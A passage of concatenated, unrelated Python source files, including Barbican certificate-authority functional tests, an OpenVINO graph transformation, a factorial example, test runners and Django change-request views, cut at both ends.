)
insight_stream = AdsInsights(**args)
insights_custom_streams.append(insight_stream)
return streams + insights_custom_streams
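# Illustrative only: the field names below are inferred from the attribute accesses in
# this module (not from spec.json), so treat the exact keys and formats as assumptions.
# A config mapping roughly like this is what check_connection()/streams() expect to
# receive before ConnectorConfig.parse_obj() is applied:
#
#   {
#       "account_id": "123456789",
#       "access_token": "<access token>",
#       "start_date": "2021-01-01T00:00:00Z",
#       "end_date": "2021-06-01T00:00:00Z",
#       "include_deleted": False,
#       "fetch_thumbnail_images": False,
#       "custom_insights": [],
#   }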
|
"""
Copyright (C) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mo.front.common.partial_infer.utils import int64_array
from mo.front.common.replacement import FrontReplacementPattern
from mo.front.tf.graph_utils import create_op_with_const_inputs
from mo.graph.graph import Graph
from mo.ops.reshape import Reshape
class OneHotDepthNormalizer(FrontReplacementPattern):
"""
    Transformation squeezes one-element tensors on the 1st input (depth) of OneHot into 0D scalars. This
    makes it possible to avoid problems with some models produced by tf2onnx, which emit a 1D depth for OneHot.
"""
enabled = True
def pattern(self):
return dict(
nodes=[
('onehot', dict(kind='op', type='OneHot'))],
edges=[]
)
@staticmethod
def replace_pattern(graph: Graph, match: dict):
node = match['onehot']
node_name = node.soft_get('name', node.id)
reshape = create_op_with_const_inputs(graph, Reshape, {1: int64_array([])}, {'name': node_name + '/Reshape'})
node.in_port(1).get_connection().insert_node(reshape)
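# Illustrative only (not part of the transformation): reshaping with an empty target
# shape, as done above via int64_array([]), turns a one-element 1D tensor into a 0D
# scalar. A minimal numpy sketch of the same idea:
#
#   >>> import numpy as np
#   >>> np.array([5]).reshape(())
#   array(5)
#   >>> np.array([5]).reshape(()).ndim
#   0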
|
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import copy
import datetime
import re
import testtools
import time
from OpenSSL import crypto
from barbican.common import hrefs
from barbican.plugin.interface import certificate_manager as cert_interface
from barbican.tests import certificate_utils as certutil
from functionaltests.api import base
from functionaltests.api.v1.behaviors import ca_behaviors
from functionaltests.api.v1.behaviors import container_behaviors
from functionaltests.api.v1.behaviors import order_behaviors
from functionaltests.api.v1.behaviors import secret_behaviors
from functionaltests.api.v1.models import ca_models
from functionaltests.api.v1.models import order_models
from functionaltests.common import config
CONF = config.get_config()
dogtag_subcas_enabled = False
admin_a = CONF.rbac_users.admin_a
admin_b = CONF.rbac_users.admin_b
creator_a = CONF.rbac_users.creator_a
service_admin = CONF.identity.service_admin
order_simple_cmc_request_data = {
'type': 'certificate',
'meta': {
'request_type': 'simple-cmc',
'requestor_name': 'Barbican User',
'requestor_email': '[email protected]',
'requestor_phone': '555-1212'
}
}
BARBICAN_SRV_CONF = cert_interface.CONF
def is_plugin_enabled(plugin):
return plugin in BARBICAN_SRV_CONF.certificate.enabled_certificate_plugins
def depends_on_ca_plugins(*plugins):
def depends_on_ca_plugins_decorator(function):
def wrapper(instance, *args, **kwargs):
plugins_enabled = (is_plugin_enabled(p) for p in plugins)
if not all(plugins_enabled):
instance.skipTest("The following plugin(s) need to be "
"enabled: {}".format(plugins))
function(instance, *args, **kwargs)
return wrapper
return depends_on_ca_plugins_decorator
def convert_to_X509Name(dn):
target = crypto.X509().get_subject()
fields = dn.split(',')
for field in fields:
m = re.search(r"(\w+)\s*=\s*(.+)", field.strip())
name = m.group(1)
value = m.group(2)
if name.lower() == 'ou':
target.OU = value
elif name.lower() == 'st':
target.ST = value
elif name.lower() == 'cn':
target.CN = value
elif name.lower() == 'l':
target.L = value
elif name.lower() == 'o':
target.O = value
return target
class CATestCommon(base.TestCase):
def setUp(self):
super(CATestCommon, self).setUp()
self.order_behaviors = order_behaviors.OrderBehaviors(self.client)
self.ca_behaviors = ca_behaviors.CABehaviors(self.client)
self.container_behaviors = container_behaviors.ContainerBehaviors(
self.client)
self.secret_behaviors = secret_behaviors.SecretBehaviors(self.client)
self.simple_cmc_data = copy.deepcopy(order_simple_cmc_request_data)
def tearDown(self):
self.order_behaviors.delete_all_created_orders()
self.ca_behaviors.delete_all_created_cas()
self.container_behaviors.delete_all_created_containers()
self.secret_behaviors.delete_all_created_secrets()
super(CATestCommon, self).tearDown()
def send_test_order(self, ca_ref=None, user_name=None,
expected_return=202):
test_model = order_models.OrderModel(**self.simple_cmc_data)
test_model.meta['request_data'] = base64.b64encode(
certutil.create_good_csr())
if ca_ref is not None:
ca_id = hrefs.get_ca_id_from_ref(ca_ref)
test_model.meta['ca_id'] = ca_id
create_resp, order_ref = self.order_behaviors.create_order(
test_model, user_name=user_name)
self.assertEqual(expected_return, create_resp.status_code)
if expected_return == 202:
self.assertIsNotNone(order_ref)
return order_ref
def wait_for_order(self, order_resp, order_ref):
# Make sure we have an active order
time_count = 1
while order_resp.model.status != "ACTIVE" and time_count <= 4:
time.sleep(1)
time_count += 1
order_resp = self.behaviors.get_order(order_ref)
def get_root_ca_ref(self, ca_plugin_name, ca_plugin_id):
(resp, cas, total, next_ref, prev_ref) = self.ca_behaviors.get_cas(
limit=100)
for item in cas:
ca = self.ca_behaviors.get_ca(item)
if ca.model.plugin_name == ca_plugin_name:
if ca.model.plugin_ca_id == ca_plugin_id:
return item
return None
def get_snakeoil_root_ca_ref(self):
return self.get_root_ca_ref(
ca_plugin_name=('barbican.plugin.snakeoil_ca.'
'SnakeoilCACertificatePlugin'),
ca_plugin_id="Snakeoil CA")
def get_dogtag_root_ca_ref(self):
return self.get_root_ca_ref(
ca_plugin_name='barbican.plugin.dogtag.DogtagCAPlugin',
ca_plugin_id="Dogtag CA")
class CertificateAuthoritiesTestCase(CATestCommon):
def setUp(self):
super(CertificateAuthoritiesTestCase, self).setUp()
self.subca_name = "Subordinate CA"
self.subca_description = "Test Snake Oil Subordinate CA"
self.subca_subca_name = "Sub-Sub CA"
self.subca_subca_description = "Test Snake Oil Sub-Sub CA"
def get_signing_cert(self, ca_ref):
resp = self.ca_behaviors.get_cacert(ca_ref)
return crypto.load_certificate(crypto.FILETYPE_PEM, resp.text)
def verify_signing_cert(self, ca_ref, subject_dn, issuer_dn):
cacert = self.get_signing_cert(ca_ref)
return ((cacert.get_subject() == subject_dn) and
(cacert.get_issuer() == issuer_dn))
def get_subca_model(self, root_ref):
now = datetime.datetime.utcnow().isoformat()
subject = "CN=Subordinate CA " + now + ", O=example.com"
return ca_models.CAModel(
parent_ca_ref=root_ref,
description=self.subca_description,
name=self.subca_name,
subject_dn=subject
)
def get_sub_subca_model(self, parent_ca_ref):
now = datetime.datetime.utcnow().isoformat()
subject = "CN=sub sub CA " + now + ", O=example.com"
return ca_models.CAModel(
parent_ca_ref=parent_ca_ref,
description=self.subca_subca_description,
name=self.subca_subca_name,
subject_dn=subject
)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_snakeoil_subca(self):
self._create_and_verify_subca(self.get_snakeoil_root_ca_ref())
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_dogtag_subca(self):
self._create_and_verify_subca(self.get_dogtag_root_ca_ref())
def _create_and_verify_subca(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(201, resp.status_code)
root_subject = self.get_signing_cert(root_ca_ref).get_subject()
self.verify_signing_cert(
ca_ref=ca_ref,
subject_dn=convert_to_X509Name(ca_model.subject_dn),
issuer_dn=root_subject)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_subca_of_snakeoil_subca(self):
self._create_subca_of_subca(self.get_snakeoil_root_ca_ref())
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_subca_of_dogtag_subca(self):
self._create_subca_of_subca(self.get_dogtag_root_ca_ref())
def _create_subca_of_subca(self, root_ca_ref):
parent_model = self.get_subca_model(root_ca_ref)
resp, parent_ref = self.ca_behaviors.create_ca(parent_model)
self.assertEqual(201, resp.status_code)
child_model = self.get_sub_subca_model(parent_ref)
resp, child_ref = self.ca_behaviors.create_ca(child_model)
self.assertEqual(201, resp.status_code)
parent_subject = self.get_signing_cert(parent_ref).get_subject()
self.verify_signing_cert(
ca_ref=child_ref,
subject_dn=convert_to_X509Name(child_model.subject_dn),
issuer_dn=parent_subject)
resp = self.ca_behaviors.delete_ca(ca_ref=child_ref)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.delete_ca(ca_ref=parent_ref)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_fail_to_create_subca_of_snakeoil_not_owned_subca(self):
self._fail_to_create_subca_of_not_owned_subca(
self.get_snakeoil_root_ca_ref())
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_fail_to_create_subca_of_dogtag_not_owned_subca(self):
self._fail_to_create_subca_of_not_owned_subca(
self.get_dogtag_root_ca_ref())
def _fail_to_create_subca_of_not_owned_subca(self, root_ca_ref):
parent_model = self.get_subca_model(root_ca_ref)
resp, parent_ref = self.ca_behaviors.create_ca(parent_model)
self.assertEqual(201, resp.status_code)
child_model = self.get_sub_subca_model(parent_ref)
resp, child_ref = self.ca_behaviors.create_ca(child_model,
user_name=admin_a)
self.assertEqual(403, resp.status_code)
resp = self.ca_behaviors.delete_ca(ca_ref=parent_ref)
self.assertEqual(204, resp.status_code)
def test_create_subca_with_invalid_parent_ca_id(self):
ca_model = self.get_subca_model(
'http://localhost:9311/cas/invalid_ref'
)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(400, resp.status_code)
def test_create_subca_with_missing_parent_ca_id(self):
ca_model = self.get_subca_model(
'http://localhost:9311/cas/missing_ref'
)
del ca_model.parent_ca_ref
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(400, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_snakeoil_subca_with_missing_subjectdn(self):
self._create_subca_with_missing_subjectdn(
self.get_snakeoil_root_ca_ref())
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_dogtag_subca_with_missing_subjectdn(self):
self._create_subca_with_missing_subjectdn(
self.get_dogtag_root_ca_ref())
def _create_subca_with_missing_subjectdn(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
del ca_model.subject_dn
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(400, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_snakeoil_subca_and_send_cert_order(self):
self._create_subca_and_send_cert_order(
self.get_snakeoil_root_ca_ref())
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_dogtag_subca_and_send_cert_order(self):
self._create_subca_and_send_cert_order(
self.get_dogtag_root_ca_ref())
def _create_subca_and_send_cert_order(self, root_ca):
ca_model = self.get_subca_model(root_ca)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(201, resp.status_code)
self.send_test_order(ca_ref)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_add_snakeoil_ca__to_project_and_get_preferred(self):
self._add_ca__to_project_and_get_preferred(
self.get_snakeoil_root_ca_ref()
)
@depends_on_ca_plugins('dogtag')
def test_add_dogtag_ca__to_project_and_get_preferred(self):
self._add_ca__to_project_and_get_preferred(
self.get_dogtag_root_ca_ref()
)
def _add_ca__to_project_and_get_preferred(self, ca_ref):
resp = self.ca_behaviors.add_ca_to_project(ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(hrefs.get_ca_id_from_ref(ca_ref), ca_id)
resp = self.ca_behaviors.remove_ca_from_project(
ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_try_and_fail_to_add_to_proj_snakeoil_subca_that_is_not_mine(self):
self._try_and_fail_to_add_to_proj_subca_that_is_not_mine(
self.get_snakeoil_root_ca_ref()
)
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_try_and_fail_to_add_to_proj_dogtag_subca_that_is_not_mine(self):
self._try_and_fail_to_add_to_proj_subca_that_is_not_mine(
self.get_dogtag_root_ca_ref()
)
def _try_and_fail_to_add_to_proj_subca_that_is_not_mine(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model, user_name=admin_a)
self.assertEqual(201, resp.status_code)
resp = self.ca_behaviors.add_ca_to_project(ca_ref, user_name=admin_b)
self.assertEqual(403, resp.status_code)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_and_delete_snakeoil_subca(self):
self._create_and_delete_subca(
self.get_snakeoil_root_ca_ref()
)
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_and_delete_dogtag_subca(self):
self._create_and_delete_subca(
self.get_dogtag_root_ca_ref()
)
def _create_and_delete_subca(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(201, resp.status_code)
self.ca_behaviors.delete_ca(ca_ref)
resp = self.ca_behaviors.get_ca(ca_ref)
self.assertEqual(404, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_and_delete_snakeoil_subca_and_artifacts(self):
ca_model = self.get_subca_model(self.get_snakeoil_root_ca_ref())
resp, ca_ref = self.ca_behaviors.create_ca(ca_model, user_name=admin_a)
self.assertEqual(201, resp.status_code)
resp = self.ca_behaviors.add_ca_to_project(ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(200, resp.status_code)
self.ca_behaviors.delete_ca(ca_ref, user_name=admin_a)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
resp = self.ca_behaviors.get_ca(ca_ref, user_name=admin_a)
self.assertEqual(404, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_fail_to_delete_top_level_snakeoil_ca(self):
self._fail_to_delete_top_level_ca(
self.get_snakeoil_root_ca_ref()
)
@depends_on_ca_plugins('dogtag')
def test_fail_to_delete_top_level_dogtag_ca(self):
self._fail_to_delete_top_level_ca(
self.get_dogtag_root_ca_ref()
)
def _fail_to_delete_top_level_ca(self, root_ca_ref):
resp = self.ca_behaviors.delete_ca(
root_ca_ref,
expected_fail=True)
self.assertEqual(403, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_snakeoil_subca_and_get_cacert(self):
self._create_subca_and_get_cacert(
self.get_snakeoil_root_ca_ref()
)
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_create_dogtag_subca_and_get_cacert(self):
self._create_subca_and_get_cacert(
self.get_dogtag_root_ca_ref()
)
def _create_subca_and_get_cacert(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model, user_name=admin_a)
self.assertEqual(201, resp.status_code)
resp = self.ca_behaviors.get_cacert(ca_ref, user_name=admin_a)
self.assertEqual(200, resp.status_code)
crypto.load_certificate(crypto.FILETYPE_PEM, resp.text)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_try_and_fail_to_use_snakeoil_subca_that_is_not_mine(self):
self._try_and_fail_to_use_subca_that_is_not_mine(
self.get_snakeoil_root_ca_ref()
)
@testtools.skipIf(not dogtag_subcas_enabled,
"dogtag subcas are deprecated")
@depends_on_ca_plugins('dogtag')
def test_try_and_fail_to_use_dogtag_subca_that_is_not_mine(self):
self._try_and_fail_to_use_subca_that_is_not_mine(
self.get_dogtag_root_ca_ref()
)
def _try_and_fail_to_use_subca_that_is_not_mine(self, root_ca_ref):
ca_model = self.get_subca_model(root_ca_ref)
resp, ca_ref = self.ca_behaviors.create_ca(ca_model, user_name=admin_a)
self.assertEqual(201, resp.status_code)
self.send_test_order(ca_ref=ca_ref, user_name=admin_a)
self.send_test_order(ca_ref=ca_ref, user_name=admin_b,
expected_return=403)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
@depends_on_ca_plugins('snakeoil_ca')
def test_create_snakeoil_subca_and_send_cert_order_and_verify_cert(self):
ca_model = self.get_subca_model(self.get_snakeoil_root_ca_ref())
resp, ca_ref = self.ca_behaviors.create_ca(ca_model)
self.assertEqual(201, resp.status_code)
order_ref = self.send_test_order(ca_ref)
order_resp = self.order_behaviors.get_order(order_ref=order_ref)
self.assertEqual(200, order_resp.status_code)
self.wait_for_order(order_resp=order_resp, order_ref=order_ref)
container_resp = self.container_behaviors.get_container(
order_resp.model.container_ref)
self.assertEqual(200, container_resp.status_code)
secret_dict = {}
for secret in container_resp.model.secret_refs:
self.assertIsNotNone(secret.secret_ref)
secret_resp = self.secret_behaviors.get_secret(
secret.secret_ref, "application/octet-stream")
self.assertIsNotNone(secret_resp)
secret_dict[secret.name] = secret_resp.content
certificate = secret_dict['certificate']
new_cert = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
signing_cert = self.get_signing_cert(ca_ref)
issuer = new_cert.get_issuer()
expected_issuer = signing_cert.get_subject()
self.assertEqual(expected_issuer, issuer)
resp = self.ca_behaviors.delete_ca(ca_ref=ca_ref)
self.assertEqual(204, resp.status_code)
class ListingCAsTestCase(CATestCommon):
"""Tests for listing CAs.
Must be in a separate class so that we can deselect them
in the parallel CA tests, until we can deselect specific tests
using a decorator.
"""
def test_list_and_get_cas(self):
(resp, cas, total, next_ref, prev_ref) = self.ca_behaviors.get_cas()
self.assertGreater(total, 0)
for item in cas:
ca = self.ca_behaviors.get_ca(item)
self.assertIsNotNone(ca.model.plugin_name)
self.assertIsNotNone(ca.model.ca_id)
self.assertIsNotNone(ca.model.plugin_ca_id)
@depends_on_ca_plugins('snakeoil_ca', 'simple_certificate')
def test_list_snakeoil_and_simple_cert_cas(self):
"""Test if backend loads these specific CAs
Since the standard gate works with the snakeoil CA and the
simple_certificate CA. This test is just to make sure that these two
are specifically loaded.
"""
(resp, cas, total, next_ref, prev_ref) = self.ca_behaviors.get_cas()
self.assertEqual(2, total)
@depends_on_ca_plugins('dogtag')
def test_list_dogtag_cas(self):
"""Test if backend loads this specific CA"""
(resp, cas, total, next_ref, prev_ref) = self.ca_behaviors.get_cas()
self.assertGreater(total, 0)
class ProjectCATestCase(CATestCommon):
def setUp(self):
super(ProjectCATestCase, self).setUp()
@depends_on_ca_plugins('snakeoil_ca', 'simple_certificate')
def test_addition_of_project_ca_affects_getting_ca_list(self):
# Getting list of CAs should get the total configured CAs
(resp, cas, initial_total, _, __) = self.ca_behaviors.get_cas()
self.assertEqual(2, initial_total)
# Set project CA
ca_ref = self.get_snakeoil_root_ca_ref()
resp = self.ca_behaviors.add_ca_to_project(ca_ref, user_name=admin_a)
self.assertEqual(204, resp.status_code)
# Getting list of CAs should get only the project CA for all users
(resp, cas, project_ca_total, _, __) = self.ca_behaviors.get_cas(
user_name=admin_a)
self.assertEqual(1, project_ca_total)
# Getting list of CAs should get only the project CA for all users
(resp, cas, project_ca_total, _, __) = self.ca_behaviors.get_cas(
user_name=creator_a)
self.assertEqual(1, project_ca_total)
# Remove project CA
resp = self.ca_behaviors.remove_ca_from_project(ca_ref,
user_name=admin_a)
self.assertEqual(204, resp.status_code)
# Getting list of CAs should get the total configured CAs (as seen
# before)
(resp, cas, final_total, _, __) = self.ca_behaviors.get_cas()
self.assertEqual(initial_total, final_total)
class GlobalPreferredCATestCase(CATestCommon):
def setUp(self):
super(GlobalPreferredCATestCase, self).setUp()
(_, self.cas, self.num_cas, _, _) = self.ca_behaviors.get_cas()
self.ca_ids = [hrefs.get_ca_id_from_ref(ref) for ref in self.cas]
def tearDown(self):
super(CATestCommon, self).tearDown()
def test_global_preferred_no_project_admin_access(self):
resp = self.ca_behaviors.get_global_preferred()
self.assertEqual(403, resp.status_code)
resp = self.ca_behaviors.set_global_preferred(ca_ref=self.cas[0])
self.assertEqual(403, resp.status_code)
resp = self.ca_behaviors.unset_global_preferred()
self.assertEqual(403, resp.status_code)
def test_global_preferred_update(self):
if self.num_cas < 2:
self.skipTest("At least two CAs are required for this test")
resp = self.ca_behaviors.set_global_preferred(
ca_ref=self.cas[0], user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_global_preferred(user_name=service_admin)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[0], ca_id)
resp = self.ca_behaviors.set_global_preferred(
ca_ref=self.cas[1], user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_global_preferred(user_name=service_admin)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[1], ca_id)
resp = self.ca_behaviors.unset_global_preferred(
user_name=service_admin)
self.assertEqual(204, resp.status_code)
def test_global_preferred_set_and_unset(self):
resp = self.ca_behaviors.set_global_preferred(
ca_ref=self.cas[0], user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_global_preferred(user_name=service_admin)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[0], ca_id)
resp = self.ca_behaviors.unset_global_preferred(
user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_global_preferred(user_name=service_admin)
self.assertEqual(404, resp.status_code)
def test_global_preferred_affects_project_preferred(self):
if self.num_cas < 2:
self.skipTest("At least two CAs are required for this test")
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
resp = self.ca_behaviors.set_global_preferred(
ca_ref=self.cas[1], user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[1], ca_id)
resp = self.ca_behaviors.unset_global_preferred(
user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
def test_project_preferred_overrides_global_preferred(self):
if self.num_cas < 2:
self.skipTest("At least two CAs are required for this test")
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
resp = self.ca_behaviors.set_global_preferred(
ca_ref=self.cas[1], user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[1], ca_id)
resp = self.ca_behaviors.add_ca_to_project(
ca_ref=self.cas[0], user_name=admin_a)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(200, resp.status_code)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[0], ca_id)
resp = self.ca_behaviors.remove_ca_from_project(
ca_ref=self.cas[0], user_name=admin_a)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
ca_id = hrefs.get_ca_id_from_ref(resp.model.ca_ref)
self.assertEqual(self.ca_ids[1], ca_id)
resp = self.ca_behaviors.unset_global_preferred(
user_name=service_admin)
self.assertEqual(204, resp.status_code)
resp = self.ca_behaviors.get_preferred(user_name=admin_a)
self.assertEqual(404, resp.status_code)
|
# The process in which a function calls itself directly or indirectly is called recursion.
# Here is a simple example of recursion in Python.
# The recursive definition mirrors the mathematical one (n! = n * (n-1)!), which keeps the
# code short and readable; see the iterative sketch below for a loop-based comparison.
def factorial(n):
if n < 0 :
return 'try non-negative integer'
elif n == 0 :
return 1
else:
return n * factorial(n-1)
n = int(input())
print(factorial(n))
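# For comparison (an illustrative sketch added here, not part of the original snippet):
# an iterative version computes the same result without using one stack frame per step,
# so it is not limited by Python's default recursion limit (roughly 1000 frames).
def factorial_iterative(n):
    if n < 0:
        return 'try non-negative integer'
    result = 1
    for i in range(2, n + 1):
        result *= i  # multiply the running product by each integer up to n
    return result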
|
"""
The test suite has some dependencies that aren't necessarily required for the
blingalytics package itself:
* You should have postgresql installed, with a "bling" user whose password is
set to "bling", and a database named "bling" owned by "bling".
* You need the following Python packages installed: mock, django and psycopg2.
To run the tests, simply run this file::
python test_runner.py
"""
import decimal
import locale
import os
import sys
import unittest
# Set standard thread-wide locale and decimal rounding settings
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
decimal.setcontext(decimal.Context(rounding=decimal.ROUND_HALF_UP))
if __name__ == '__main__':
test_dir = os.path.dirname(os.path.abspath(__file__))
package_dir = os.path.normpath(os.path.join(test_dir, os.pardir, 'blingalytics'))
sys.path = [test_dir, package_dir] + sys.path
os.environ['DJANGO_SETTINGS_MODULE'] = 'support_django.settings'
suite = unittest.TestLoader().loadTestsFromNames([
'test_base',
'test_helpers',
'caches.test_redis_cache',
'sources.test_base',
'sources.test_derived',
'sources.test_django_orm',
# 'sources.test_merge',
'sources.test_static',
])
result = unittest.TextTestRunner(verbosity=1).run(suite)
sys.exit(len(result.errors) + len(result.failures))
|
from dotenv import load_dotenv
load_dotenv()
from src.dao.firebase import firebase_instance
id_token = "id_token"
if __name__ == '__main__':
firebase = firebase_instance()
auth = firebase.auth()
account_info = auth.get_account_info(id_token)
print(account_info)
|
print(1 + 2) # addition
print(1 - 2) # subtraction
print(1 * 2) # multiplication
print(1 / 2) # float division
print(3 ** 2) # exponentiation
print(3 % 2) # modulo
print(3 // 2) # floor (integer) division
# Check data types
print(type(1))
print(type(1.11))
print(type(1 + 2j))
print(type("Python"))
print(type([1, 2, 3]))
print(type({'name': '张三'}))
print(type({1.1, 2.2, 3.3}))
|
import zengin
if __name__ == '__main__':
print(zengin.Bank.get('0001'))
for bank in zengin.Bank.search('み'):
print(bank)
for branch in zengin.Branch.get('0001', '001'):
print(branch)
for branch in zengin.Branch.search('0005', 'キチジョウジ'):
print(branch)
for bank in zengin.Bank.major_banks():
print(bank)
for branch in zengin.Bank.get('0001').branches:
print(branch)
for a in zengin.Bank.search('ユウチヨ'):
print(a)
|
"""django-changerequest views"""
from django.core.exceptions import ImproperlyConfigured
from django.db import transaction
from django.http import HttpResponseRedirect, QueryDict
from django.urls import reverse
from django.views.generic import DetailView, ListView
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.contrib import messages as msg
from .forms import HistoryCommentOptionalForm
from .models import ChangeRequest
class PermissionMessageMixin(PermissionRequiredMixin):
""""
PermissionRequiredMixin modified to show error message to user.
By default the PermissionRequiredMixin does not generate an error message, it just redirects to the login page.
As that can be confusing, this simple mixin makes sure the "permission_denied_message" string is returned to the
user via the messages framework and also sets a reasonable default value for it.
"""
permission_denied_message = 'You do not have sufficient permissions to access this page'
def handle_no_permission(self):
msg.add_message(self.request, msg.ERROR, self.permission_denied_message)
return super().handle_no_permission()
class HistoryFormViewMixin:
@transaction.atomic
def form_valid(self, form):
# We don't call super() here because the original form_valid() calls form.save() without commit=False
# If commit=True, then form.save() will *always* save ManyToMany fields, which is bad
form.instance.comment = form.cleaned_data['comment']
self.object = form.save(commit=False)
# By using commit=False, the form gains a "save_m2m()" function, but doesn't actually save the instance
        # which is bad because django-changerequest functionality is triggered there. So let's do it manually:
form.instance.save(form=form)
return HttpResponseRedirect(self.get_success_url())
class HistoryFormsetViewMixin:
formset_class = None
def get_comment_form(self):
if self.request.method in ('POST', 'PUT'):
return HistoryCommentOptionalForm(prefix=self.get_prefix(), data=self.request.POST, files=self.request.FILES)
else:
return HistoryCommentOptionalForm(prefix=self.get_prefix())
def get_context_data(self, **kwargs):
if 'comment_form' not in kwargs:
kwargs['comment_form'] = self.get_comment_form()
return super().get_context_data(**kwargs)
def get_form(self, form_class=None):
if self.formset_class is None:
